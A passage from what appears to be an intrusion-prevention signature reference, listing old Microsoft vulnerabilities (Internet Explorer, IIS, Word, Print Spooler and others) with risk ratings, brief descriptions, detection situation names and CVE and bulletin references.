Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is an information disclosure vulnerability in Microsoft Internet Explorer. A successful attack results in the disclosure of information from a Web page on another domain.
Situation: HTTP_SS-Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure
File-Text_Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure
References:
CVE-2008-1544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1544
BID-28379
http://www.securityfocus.com/bid/28379
MS08-031
http://technet.microsoft.com/security/bulletin/MS08-031
Back to top

HTTP-Microsoft-IIS-Server-Name-Variable-Spoof

About this vulnerability: SERVER_NAME variable spoof vulnerability in Microsoft IIS
Risk: Moderate
First detected in: sgpkg-ips-36-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IIS 5.0; IIS 5.1; IIS 6.0; Apache; Apache2
Type: Malfunction
Description: Microsoft IIS 5.x and 6.0 are vulnerable to SERVER_NAME variable spoofing. A remote attacker can exploit this vulnerability to disclose sensitive information.
Situation: HTTP_CS-Server-Name-Variable-Spoof-2
HTTP_CS-Server-Name-Variable-Spoof
References:
CVE-2005-2678
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2678
Back to top

HTTP-Microsoft-IIS-Unicode-WebDAV-Authentication-Bypass

About this vulnerability: Unicode encoded request might bypass authentication
Risk: High
First detected in: sgpkg-ips-221-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: A vulnerability in Microsoft Internet Information Service (IIS) allows a remote unauthenticated attacker to bypass authentication leading to an unauthorized access.
Situation: HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-5
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-4
HTTP_CSU-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-6
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-2
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-3
References:
CVE-2009-1535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1535
BID-34993
http://www.securityfocus.com/bid/34993
MS09-020
http://technet.microsoft.com/security/bulletin/MS09-020
Back to top

HTTP-Microsoft-IIS-WebDAV-Source-Code-Disclosure

About this vulnerability: Source code disclosure vulnerability in Microsoft IIS 5.1
Risk: Moderate
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 5.1
Type: Malfunction
Description: Microsoft Internet Information Server 5.1 has a vulnerability that allows remote users to request source code located on the server. This vulnerability is present only in configurations where the scripts are stored on a FAT or FAT32 partition and the server's operating system uses special settings in the Regional and Language Options.
Situation: HTTP_CS-Microsoft-IIS-WebDAV-Source-Code-Disclosure
References:
BID-14764
http://www.securityfocus.com/bid/14764
Back to top

HTTP-Microsoft-Internet-Explorer-Adodb.Connection-Execute-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary non-privileged code execution on the victim's computer.
Situation: HTTP_SS-Vulnerable-Microsoft-Internet-Explorer-Function-Called
File-Text_Vulnerable-Microsoft-Internet-Explorer-Function-Called
References:
CVE-2006-5559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5559
BID-20704
http://www.securityfocus.com/bid/20704
OSVDB-31882
http://www.osvdb.org/31882
MS07-009
http://technet.microsoft.com/security/bulletin/MS07-009
Back to top

HTTP-Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0
Type: Buffer Overflow
Description: Microsoft Internet Explorer has a memory corruption vulnerability in the handling of references to CLSIDs that reference certain COM objects that are not ActiveX controls. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary code execution on the victim's computer.
Situation: HTTP_Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
References:
CVE-2006-4495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4495
BID-19636
http://www.securityfocus.com/bid/19636
Back to top

HTTP-Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption

About this vulnerability: Buffer overflow vulnerability in the processing of crafted Content Advisor files in Internet Explorer
Risk: High
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the processing of crafted Content Advisor files in Internet Explorer. A successful exploitation of this vulnerability requires persuading a target user to open a specially crafted rat file, to install the rating system described in it and to access to Content Advisory settings after the rating system is installed, which leads to arbitrary code execution with the privileges of the currently logged in target user.
Situation: HTTP_Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption
File-TextId_Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption
References:
CVE-2005-0555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0555
BID-13117
http://www.securityfocus.com/bid/13117
OSVDB-15466
http://www.osvdb.org/15466
MS05-020
http://technet.microsoft.com/security/bulletin/MS05-020
Back to top

HTTP-Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in the handling of certain HTML tags containing a specially crafted CSS style attribute in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0
Type: Malfunction
Description: There is a memory corruption vulnerability in the handling of certain HTML tags containing a specially crafted CSS style attribute in Microsoft Internet Explorer. The vulnerability can be exploited remotely by persuading a user to visit a malicious web site with the vulnerable browser to execute arbitrary code under the context of the currently logged-in user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption
References:
CVE-2007-1750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1750
BID-24423
http://www.securityfocus.com/bid/24423
OSVDB-35349
http://www.osvdb.org/35349
MS07-033
http://technet.microsoft.com/security/bulletin/MS07-033
Back to top

HTTP-Microsoft-Internet-Explorer-Data-Stream-Handling-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can exploit this vulnerability with a crafted HTTP response and web page to execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Data-Stream-Handling-Memory-Corruption
References:
CVE-2008-1085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1085
BID-28552
http://www.securityfocus.com/bid/28552
OSVDB-44205
http://www.osvdb.org/44205
MS08-024
http://technet.microsoft.com/security/bulletin/MS08-024
Back to top

HTTP-Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of the Spline method in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-79-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the handling of the Spline method in Internet Explorer. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary non-privileged code execution on the victim's computer.
Situation: HTTP_Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow
References:
CVE-2006-4446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4446
BID-19738
http://www.securityfocus.com/bid/19738
OSVDB-28841
http://www.osvdb.org/28841
MS06-067
http://technet.microsoft.com/security/bulletin/MS06-067
Back to top

HTTP-Microsoft-Internet-Explorer-IsComponentInstalled-BOF

About this vulnerability: Detects Microsoft Internet Explorer IsComponentInstalled BOF exploits
Risk: High
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0
Type: Buffer Overflow
Description: Microsoft Internet Explorer has a buffer overflow vulnerability concerning the IsComponentInstalled method. The vulnerability can be exploited by persuading a user to view a malicious web site that contains an IsComponentInstalled method call with an overly long first argument. A successful exploitation leads to arbitrary code excecution in the context of the user running the vulnerable browser.
Situation: HTTP_SS-Microsoft-Internet-Explorer-IsComponentInstalled-BOF
File-Text_Microsoft-Internet-Explorer-IsComponentInstalled-BOF
References:
CVE-2006-1016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1016
BID-16870
http://www.securityfocus.com/bid/16870
OSVDB-31647
http://www.osvdb.org/31647
Back to top

HTTP-Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of excessively long MHTML URI strings in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: Internet Explorer has a buffer overflow vulnerability in the handling of excessively long MHTML URI strings. An exploitation of this vulnerability requires persuading a user running the vulnerable web browser to visit a crafted web page that contains an excessively long MHTML URI string as a link. When the malicious link is clicked by the target user, the vulnerability is triggered and the vulnerable browser terminated.
Situation: HTTP_Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow
References:
CVE-2006-2766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2766
BID-18198
http://www.securityfocus.com/bid/18198
OSVDB-25949
http://www.osvdb.org/25949
MS06-043
http://technet.microsoft.com/security/bulletin/MS06-043
Back to top

HTTP-Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability

About this vulnerability: A vulnerability in Microsoft Internet Explorer allows code execution in the local security zone
Risk: Moderate
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0
Type: Input Validation
Description: There is a vulnerability in the MHTML protocol handler of Microsoft Internet Explorer. A malicious, crafted URI can be used to load and execute code from a compressed HTML (CHM) file in the context of the local user.
Situation: HTTP_Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability
File-Text_Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability
References:
CVE-2004-0380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0380
BID-9658
http://www.securityfocus.com/bid/9658
MS04-013
http://technet.microsoft.com/security/bulletin/MS04-013
Back to top

HTTP-Microsoft-Internet-Explorer-PNG-Image-Rendering-Buffer-Overflow

About this vulnerability: PNG image rendering buffer overflow in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0;
Type: Buffer Overflow
Description: The PNG decoder library of Internet Explorer has a vulnerability in the processing of the transparency data of PNG images. The library fails to validate the size of this data before it is copied into a fixed size buffer. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.
Situation: HTTP_PNG-Image-With-Large-Data-Length-Value
E-Mail_BS-PNG-Image-With-Large-Data-Length-Value
File-PNG_PNG-Image-With-Large-Data-Length-Value
References:
CVE-2005-1211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1211
BID-13941
http://www.securityfocus.com/bid/13941
MS05-025
http://technet.microsoft.com/security/bulletin/MS05-025
Back to top

HTTP-Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-81-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Internet Explorer. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary non-privileged code execution on the victim's computer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow
References:
CVE-2006-3730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3730
BID-19030
http://www.securityfocus.com/bid/19030
OSVDB-27110
http://www.osvdb.org/27110
MS06-057
http://technet.microsoft.com/security/bulletin/MS06-057
Back to top

HTTP-Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Internet Explorer. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary non-privileged code execution on the victim's computer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow
References:
CVE-2006-4868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4868
BID-20096
http://www.securityfocus.com/bid/20096
OSVDB-28946
http://www.osvdb.org/28946
MS06-055
http://technet.microsoft.com/security/bulletin/MS06-055
Back to top

HTTP-Microsoft-Isa-Server-HTTP-Request-Smuggling

About this vulnerability: Microsoft ISA server HTTP request smuggling vulnerability
Risk: Moderate
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft ISA Server
Type: Malfunction
Description: Microsoft ISA Server 2000 has an HTTP request smuggling vulnerability. The web cache of Microsoft ISA server can be poisoned by sending a crafted HTTP request containing multiple content-length header fields. An attacker that exploits this vulnerability succesfully can bypass ISA server content restrictions.
References:
CVE-2005-1215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1215
BID-13956
http://www.securityfocus.com/bid/13956
OSVDB-17311
http://www.osvdb.org/17311
MS05-034
http://technet.microsoft.com/security/bulletin/MS05-034
Back to top

HTTP-Microsoft-Management-Console-Cross-Site-Scripting

About this vulnerability: A vulnerability in Microsoft Management Console allows cross site scripting
Risk: High
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP4
Software: <os>
Type: Cross-site Scripting
Description: There is a cross site scripting vulnerability in the Microsoft Windows, which allows Microsoft Management Console components to be referenced from a web page. This can be used to execute code in the local zone leading to system compromise.
Situation: HTTP_Microsoft-Management-Console-Cross-Site-Scripting
File-Text_Microsoft-Management-Console-Cross-Site-Scripting
References:
CVE-2006-3643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3643
BID-19417
http://www.securityfocus.com/bid/19417
MS06-044
http://technet.microsoft.com/security/bulletin/MS06-044
Back to top

HTTP-Microsoft-Office-MSODataSourceControl-ActiveX-Control-Denial-Of-Service

About this vulnerability: Null pointer dereference vulnerability in the Microsoft Office 2003 DataSourceControl ActiveX control
Risk: Moderate
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There is a null pointer dereference vulnerability in the Microsoft Office 2003 DataSourceControl ActiveX control. A successful exploit leads to a denial of service terminating Internet Explorer.
Situation: HTTP_SS-Microsoft-Office-MSODataSourceControl-ActiveX-Control-Denial-Of-Service
File-Text_Microsoft-Office-MSODataSourceControl-ActiveX-Denial-Of-Service
References:
BID-24462
http://www.securityfocus.com/bid/24462
Back to top

HTTP-Microsoft-Office-Web-Components-Datasource-Code-Execution

About this vulnerability: File creation vulnerability in Microsoft Web Components Control ActiveX control
Risk: High
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-1710-5242
Platform: Windows
Software: Microsoft Office Web Components
Type: Malfunction
Description: There is a file creation vulnerability in Microsoft Web Components Control ActiveX control. A remote attacker can exploit this vulnerability via a specially crafted web page to create arbitrary files on the target system.
Situation: HTTP_SS-Microsoft-Office-Web-Components-Datasource-Code-Execution
File-Text_Microsoft-Office-Web-Components-Datasource-Code-Execution
References:
CVE-2007-1201
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1201
BID-28136
http://www.securityfocus.com/bid/28136
OSVDB-42712
http://www.osvdb.org/42712
MS08-017
http://technet.microsoft.com/security/bulletin/MS08-017
Back to top

HTTP-Microsoft-OLE-Automation-String-Manipulation-Heap-Overflow

About this vulnerability: Buffer overflow vulnerability in the Microsoft Object Linking and Embedding Automation library
Risk: Moderate
First detected in: sgpkg-ips-121-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: There is a buffer overflow vulnerability in the Microsoft Object Linking and Embedding Automation library. The vulnerability is due to a lack of parameter checking in the substringData method. By enticing a user to visit a crafted web site, a remote attacker can execute non-privileged arbitrary code.
Situation: HTTP_Core-Services-And-OLE-Automation-SubstringData-Memory-Corruption
File-Text_Core-Services-And-OLE-Automation-SubstringData-Memory-Corruption
References:
CVE-2007-2224
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2224
BID-25282
http://www.securityfocus.com/bid/25282
MS07-043
http://technet.microsoft.com/security/bulletin/MS07-043
Back to top

HTTP-Microsoft-Print-Spooler-Service-AddPrinter-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Microsoft Print Spooler Service Addprinter function
Risk: High
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Microsoft Print Spooler service in Windows 2000, Windows XP, and Windows Server 2003 before patch MS05-043 suffer from a buffer overflow vulnerability. A malicious AddPrinter function call to the SPOOLS interface can be used by remote attackers to execute arbitrary code on a vulnerable system.
Situation: MSRPC-TCP_CPS-Microsoft-Print-Spooler-Service-AddPrinterEx-Buffer-Overflow
MSRPC-TCP_CPS-Microsoft-Print-Spooler-Service-AddPrinter-Buffer-Overflow
MSRPC-TCP_CPS-Microsoft-Print-Spooler-Service-AddPrinter-Buffer-Overflow-1
References:
CVE-2005-1984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1984
BID-14514
http://www.securityfocus.com/bid/14514
MS05-043
http://technet.microsoft.com/security/bulletin/MS05-043
Back to top

HTTP-Microsoft-SMTP-Service-Data-Transfer-Command-Denial-Of-Service

About this vulnerability: A malformed data transfer request to Microsoft SMTP Service can cause denial of service
Risk: Low
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Microsoft SMTP Service suffers from a denial of service vulnerability when processing data transfer request command.
Situation: SMTP_Microsoft-SMTP-Service-Data-Transfer-Command-Denial-Of-Service
References:
CVE-2002-0055
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0055
BID-4204
http://www.securityfocus.com/bid/4204
MS02-012
http://technet.microsoft.com/security/bulletin/MS02-012
Back to top

HTTP-Microsoft-Troubleshooter-ActiveX-Control-Buffer-Overflow

About this vulnerability: Troubleshooter ActiveX Buffer Overflow
Risk: Moderate
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ActiveX
Type: Buffer Overflow
Description: There is a vulnerability in certain versions of the Microsoft Troubleshooter ActiveX Control. The vulnerability can be exploited by luring the target user to a hostile web server that can trigger and exploit the vulnerability. Successful exploitation leads to remote compromise of the client host, allowing the attacker to install bots or other malware on the client system.
Situation: HTTP_SS-Microsoft-Local-Troubleshooter-ActiveX-Control-Buffer-Overflow
File-Text_Microsoft-Local-Troubleshooter-ActiveX-Control-Buffer-Overflow
References:
CVE-2003-0662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0662
BID-8833
http://www.securityfocus.com/bid/8833
MS03-042
http://technet.microsoft.com/security/bulletin/MS03-042
Back to top

HTTP-Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Code-Execution

About this vulnerability: Access control vulnerability in Microsoft Visual Studio 2005
Risk: Moderate
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visual Studio 2005
Type: Malfunction
Description: There is an access control vulnerability in Microsoft Visual Studio 2005. The vulnerability can be exploited by persuading a target user to view a malicious HTML page. This allows non-privileged code execution.
Situation: HTTP_Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Control-Usage
File-Text_Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Control-Usage
References:
CVE-2006-4704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4704
BID-20843
http://www.securityfocus.com/bid/20843
MS06-073
http://technet.microsoft.com/security/bulletin/MS06-073
Back to top

HTTP-Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Microsoft Windows ActiveX Control hxvz.dll
Risk: High
First detected in: sgpkg-ips-151-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Help
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Windows ActiveX Control hxvz.dll. A remote attacker can exploit this vulnerability via a specially crafted web page to execute arbitrary code on the victim's host with the privileges of the currently logged in user.
Situation: HTTP_SS-Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption
File-Text_Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption
References:
CVE-2008-1086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1086
BID-28606
http://www.securityfocus.com/bid/28606
MS08-023
http://technet.microsoft.com/security/bulletin/MS08-023
Back to top

HTTP-Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow

About this vulnerability: Buffer overflow vulnerability in Microsoft Windows Graphics Device Interface (GDI)
Risk: High
First detected in: sgpkg-ips-150-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Microsoft Windows Graphics Device Interface (GDI). A remote attacker can exploit this vulnerability by persuading a user to open a malicious EMF file or to visit an EMF-embedded web page. Successful exploitation could allow the attacker to execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow
File-Binary_Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow
References:
CVE-2008-1087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1087
BID-28570
http://www.securityfocus.com/bid/28570
OSVDB-44215
http://www.osvdb.org/44215
MS08-021
http://technet.microsoft.com/security/bulletin/MS08-021
Back to top

HTTP-Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow

About this vulnerability: Microsoft Windows Media Player suffers buffer overflow in playlist parsing
Risk: Moderate
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003
Software: Windows Media Player
Type: Buffer Overflow
Description: There is a buffer overflow in the way Microsoft Windows Media Player handles references to unregistered protocols in playlists.
Situation: HTTP_Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow
File-TextId_Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow
References:
CVE-2006-6134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6134
BID-21247
http://www.securityfocus.com/bid/21247
MS06-078
http://technet.microsoft.com/security/bulletin/MS06-078
Back to top

HTTP-Microsoft-Windows-Shell-MSHTA-Script-Execution

About this vulnerability: Script code execution vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a script code execution vulnerability in Windows. The vulnerability can be exploited by persuading a user to attempt to open a specially crafted OLE Compound file with an unregistered file extension by double-clicking it, causing arbitrary script code execution with the privileges of the currently logged in user.
Situation: HTTP_Microsoft-Windows-Shell-MSHTA-Script-Execution
E-Mail_BS-Microsoft-Windows-Shell-MSHTA-Script-Execution
File-OLE_Microsoft-Windows-Shell-MSHTA-Script-Execution
References:
CVE-2005-0063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0063
BID-13132
http://www.securityfocus.com/bid/13132
MS05-016
http://technet.microsoft.com/security/bulletin/MS05-016
Back to top

HTTP-Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption

About this vulnerability: Microsoft Word Crafted Sprm Structure Stack Memory Corruption
Risk: Moderate
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Word products. The flaw is due to improper handling of crafted record size in Word documents. An attacker can exploit this vulnerability by persuading the target user to open a malicious Word document. Successful attack could allow for arbitrary code injection and execution with privileges of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, affected product will terminate resulting in the loss of any unsaved data from the current session.
Situation: HTTP_SS-Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption
File-OLE_Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption
References:
CVE-2008-4837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4837
BID-32584
http://www.securityfocus.com/bid/32584
MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072
Back to top

HTTP-Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-88-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Word
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Word. The vulnerability can be exploited by delivering a malicious Word document to the target user who opens it with the affected application. This leads to a DoS terminating the vulnerable appalication or arbitrary code execution with the privileges of the currently logged in user.
Situation: HTTP_SS-Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption
File-OLE_Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption
References:
CVE-2006-6561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6561
BID-21589
http://www.securityfocus.com/bid/21589
MS07-014
http://technet.microsoft.com/security/bulletin/MS07-014
Back to top

HTTP-Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow

About this vulnerability: Microsoft Word RTF Mismatched dpendgroup Buffer Overflow
Risk: Moderate
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There exists a buffer overflow vulnerability in Microsoft Word products. The flaw is due to a boundary error when processing RTF documents that contain mismatched dpendgroup control words. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted RTF file. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, affected product will terminate resulting in the loss of any unsaved data from the current session.
Situation: HTTP_SS-Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow
File-RTF_Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow
References:
CVE-2008-4030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4030
BID-32642
http://www.securityfocus.com/bid/32642
MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072
Back to top

HTTP-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption

About this vulnerability: Microsoft Word RTF Stylesheet Control Word Memory Corruption
Risk: Moderate
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Word products. The flaw is due to an index error when processing RTF documents that contain more than six \stylesheet control words. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted RTF file. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, affected product will terminate resulting in the loss of any unsaved data from the current session.
Situation: HTTP_SS-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption
HTTP_SS-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption-DOS
File-RTF_Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption-DOS
File-RTF_Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption
References:
